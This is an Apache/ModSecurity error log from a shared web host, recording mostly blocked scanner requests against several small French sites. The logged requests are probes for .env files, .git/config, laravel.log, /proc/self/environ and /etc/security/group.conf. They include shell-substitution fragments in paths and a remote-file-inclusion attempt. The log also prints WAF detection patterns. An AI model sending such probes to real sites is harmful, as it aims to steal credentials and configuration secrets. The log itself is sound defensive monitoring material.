[Mon May 11 12:45:01.375965 2026] [security2:error] [pid 1256241:tid 1256248] [client 185.177.72.9:40060] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/(pwd)/.env.staging"] [unique_id "agGzLZkIEwRJMyDaV55gmAAAAUI"]
[Mon May 11 12:45:02.609046 2026] [security2:error] [pid 1256241:tid 1256248] [client 185.177.72.9:40060] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGzLZkIEwRJMyDaV55gmAAAAUI"]
[Mon May 11 12:45:03.614864 2026] [authz_core:error] [pid 1254179:tid 1254191] [client 216.73.216.110:55328] AH01630: client denied by server configuration: /home/missmand/public_html/learning/old/main/auth/cas/lib/CAS/PGTStorage/error_log
[Mon May 11 12:45:07.615998 2026] [security2:error] [pid 1254242:tid 1254255] [client 185.177.72.9:56244] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /$(pwd)/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/$(pwd)/.git/config"] [unique_id "agGzM74KNmD_mZ_vlf9NZQAAAEo"]
[Mon May 11 12:45:07.616504 2026] [security2:error] [pid 1254242:tid 1254255] [client 185.177.72.9:56244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/$(pwd)/.git/config"] [unique_id "agGzM74KNmD_mZ_vlf9NZQAAAEo"]
[Mon May 11 12:45:08.812801 2026] [security2:error] [pid 1254242:tid 1254255] [client 185.177.72.9:56244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGzM74KNmD_mZ_vlf9NZQAAAEo"]
[Mon May 11 12:45:08.838369 2026] [security2:error] [pid 1254212:tid 1254227] [client 185.177.72.9:56254] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /(pwd)/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/(pwd)/.git/config"] [unique_id "agGzNEYQeUtAPynIs6xrZwAAAA0"]
[Mon May 11 12:45:08.839090 2026] [security2:error] [pid 1254212:tid 1254227] [client 185.177.72.9:56254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/(pwd)/.git/config"] [unique_id "agGzNEYQeUtAPynIs6xrZwAAAA0"]
[Mon May 11 12:45:10.056194 2026] [security2:error] [pid 1254212:tid 1254227] [client 185.177.72.9:56254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGzNEYQeUtAPynIs6xrZwAAAA0"]
[Mon May 11 12:45:41.342977 2026] [security2:error] [pid 1256241:tid 1256264] [client 185.177.72.9:59446] ModSecurity: Warning. Pattern match "(?i:(?:[\\\\d\\\\W]\\\\s+as\\\\s*?[\\"'`\\\\w]+\\\\s*?from)|(?:^[\\\\W\\\\d]+\\\\s*?(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc)\\\\b)|(?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\\\s+(?:(?:group_)concat|char|load ..." at ARGS_NAMES:*update*. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "81"] [id "942360"] [rev "2"] [msg "Detects concatenated basic SQL injection and SQLLFI attempts"] [data "Matched Data: *update found within ARGS_NAMES:*update*: *update*"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "jeanboyault.fr"] [uri "/package-updates/*"] [unique_id "agGzVZkIEwRJMyDaV55gugAAAVI"]
[Mon May 11 12:45:41.343441 2026] [security2:error] [pid 1256241:tid 1256264] [client 185.177.72.9:59446] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/package-updates/*"] [unique_id "agGzVZkIEwRJMyDaV55gugAAAVI"]
[Mon May 11 12:45:42.538116 2026] [security2:error] [pid 1256241:tid 1256264] [client 185.177.72.9:59446] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Detects concatenated basic SQL injection and SQLLFI attempts"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGzVZkIEwRJMyDaV55gugAAAVI"]
[Mon May 11 12:45:42.564981 2026] [security2:error] [pid 1254328:tid 1254348] [client 185.177.72.9:59462] ModSecurity: Warning. Pattern match "(?i:(?:[\\\\d\\\\W]\\\\s+as\\\\s*?[\\"'`\\\\w]+\\\\s*?from)|(?:^[\\\\W\\\\d]+\\\\s*?(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc)\\\\b)|(?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\\\s+(?:(?:group_)concat|char|load ..." at ARGS_NAMES:*update*. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "81"] [id "942360"] [rev "2"] [msg "Detects concatenated basic SQL injection and SQLLFI attempts"] [data "Matched Data: *update found within ARGS_NAMES:*update*: *update*"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.jeanboyault.fr"] [uri "/package-updates/*"] [unique_id "agGzVkRdw2n9wv6Ai48bDQAAAJI"]
[Mon May 11 12:45:42.565063 2026] [security2:error] [pid 1254328:tid 1254348] [client 185.177.72.9:59462] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/package-updates/*"] [unique_id "agGzVkRdw2n9wv6Ai48bDQAAAJI"]
[Mon May 11 12:45:43.787923 2026] [security2:error] [pid 1254328:tid 1254348] [client 185.177.72.9:59462] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Detects concatenated basic SQL injection and SQLLFI attempts"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGzVkRdw2n9wv6Ai48bDQAAAJI"]
[Mon May 11 12:45:55.875593 2026] [authz_core:error] [pid 1254242:tid 1254255] [client 47.128.28.13:32478] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/theme-compat/error_log
[Mon May 11 12:46:50.900802 2026] [security2:error] [pid 1256241:tid 1256266] [client 85.208.96.193:33508] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://143.198.208.31 found within ARGS:url: http://143.198.208.31/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGzmpkIEwRJMyDaV55hGAAAAVQ"]
[Mon May 11 12:46:50.901706 2026] [security2:error] [pid 1256241:tid 1256266] [client 85.208.96.193:33508] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGzmpkIEwRJMyDaV55hGAAAAVQ"]
[Mon May 11 12:46:50.902194 2026] [security2:error] [pid 1256241:tid 1256266] [client 85.208.96.193:33508] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGzmpkIEwRJMyDaV55hGAAAAVQ"]
[Mon May 11 12:47:24.485562 2026] [authz_core:error] [pid 1254133:tid 1254142] [client 51.83.6.238:43130] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/app/plugins-recommendation/error_log
[Mon May 11 12:47:25.944701 2026] [authz_core:error] [pid 1254133:tid 1254142] [client 51.83.6.238:43130] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/app/plugins-recommendation/error_log
[Mon May 11 12:47:27.532551 2026] [authz_core:error] [pid 1254133:tid 1254142] [client 51.83.6.238:43130] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/theme-files/typography/error_log
[Mon May 11 12:47:33.233605 2026] [security2:error] [pid 1254328:tid 1254341] [client 216.73.216.110:17642] ModSecurity: Warning. Matched phrase "etc/security/group" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/security/group found within ARGS:filesrc: /etc/security/group.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGzxURdw2n9wv6Ai48blQAAAIo"]
[Mon May 11 12:47:33.235080 2026] [security2:error] [pid 1254328:tid 1254341] [client 216.73.216.110:17642] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGzxURdw2n9wv6Ai48blQAAAIo"]
[Mon May 11 12:47:33.601879 2026] [security2:error] [pid 1254328:tid 1254341] [client 216.73.216.110:17642] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGzxURdw2n9wv6Ai48blQAAAIo"]
[Mon May 11 12:47:39.936490 2026] [security2:error] [pid 1254242:tid 1254257] [client 216.73.216.110:36396] ModSecurity: Warning. Matched phrase "proc/self/environ" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: proc/self/environ found within ARGS:filesrc: /proc/self/environ"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGzy74KNmD_mZ_vlf9OCgAAAEw"]
[Mon May 11 12:47:39.941641 2026] [security2:error] [pid 1254242:tid 1254257] [client 216.73.216.110:36396] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGzy74KNmD_mZ_vlf9OCgAAAEw"]
[Mon May 11 12:47:40.016877 2026] [security2:error] [pid 1254242:tid 1254257] [client 216.73.216.110:36396] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGzy74KNmD_mZ_vlf9OCgAAAEw"]
[Mon May 11 12:49:17.978656 2026] [authz_core:error] [pid 1254133:tid 1254142] [client 47.128.58.254:46040] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/rest-api/fields/error_log
[Mon May 11 12:50:01.446379 2026] [:error] [pid 1254179:tid 1254194] [client 20.118.20.77:25631] File does not exist: /home/cpcentre/public_html/wp-login.php
[Mon May 11 12:50:02.464627 2026] [security2:error] [pid 1254133:tid 1254156] [client 5.255.122.18:41296] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "homin.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agG0WhjZymfuKpjWXeiRMAAAANQ"]
[Mon May 11 12:50:02.464275 2026] [security2:error] [pid 1254133:tid 1254136] [client 5.255.122.18:41408] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/.env.bak"] [unique_id "agG0WhjZymfuKpjWXeiRLwAAAME"]
[Mon May 11 12:50:02.464983 2026] [security2:error] [pid 1254133:tid 1254156] [client 5.255.122.18:41296] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agG0WhjZymfuKpjWXeiRMAAAANQ"]
[Mon May 11 12:50:02.465136 2026] [security2:error] [pid 1254133:tid 1254136] [client 5.255.122.18:41408] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/.env.bak"] [unique_id "agG0WhjZymfuKpjWXeiRLwAAAME"]
[Mon May 11 12:50:02.465886 2026] [security2:error] [pid 1254179:tid 1254188] [client 5.255.122.18:41290] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/.git/config"] [unique_id "agG0WmS6k_SCYd1AVZrE3gAAAQc"]
[Mon May 11 12:50:02.465915 2026] [security2:error] [pid 1254328:tid 1254333] [client 5.255.122.18:41378] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/.env.production"] [unique_id "agG0WkRdw2n9wv6Ai48cEgAAAII"]
[Mon May 11 12:50:02.464534 2026] [security2:error] [pid 1254328:tid 1254334] [client 5.255.122.18:41382] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/.env.local"] [unique_id "agG0WkRdw2n9wv6Ai48cEAAAAIM"]
[Mon May 11 12:50:02.466070 2026] [security2:error] [pid 1254179:tid 1254188] [client 5.255.122.18:41290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/.git/config"] [unique_id "agG0WmS6k_SCYd1AVZrE3gAAAQc"]
[Mon May 11 12:50:02.466061 2026] [security2:error] [pid 1254242:tid 1254249] [client 5.255.122.18:41366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/.env.example"] [unique_id "agG0Wr4KNmD_mZ_vlf9OgQAAAEM"]
[Mon May 11 12:50:02.466240 2026] [security2:error] [pid 1254242:tid 1254249] [client 5.255.122.18:41366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/.env.example"] [unique_id "agG0Wr4KNmD_mZ_vlf9OgQAAAEM"]
[Mon May 11 12:50:02.466293 2026] [security2:error] [pid 1254328:tid 1254333] [client 5.255.122.18:41378] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/.env.production"] [unique_id "agG0WkRdw2n9wv6Ai48cEgAAAII"]
[Mon May 11 12:50:02.466981 2026] [security2:error] [pid 1256241:tid 1256256] [client 5.255.122.18:41504] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/.env.old"] [unique_id "agG0WpkIEwRJMyDaV55hzQAAAUo"]
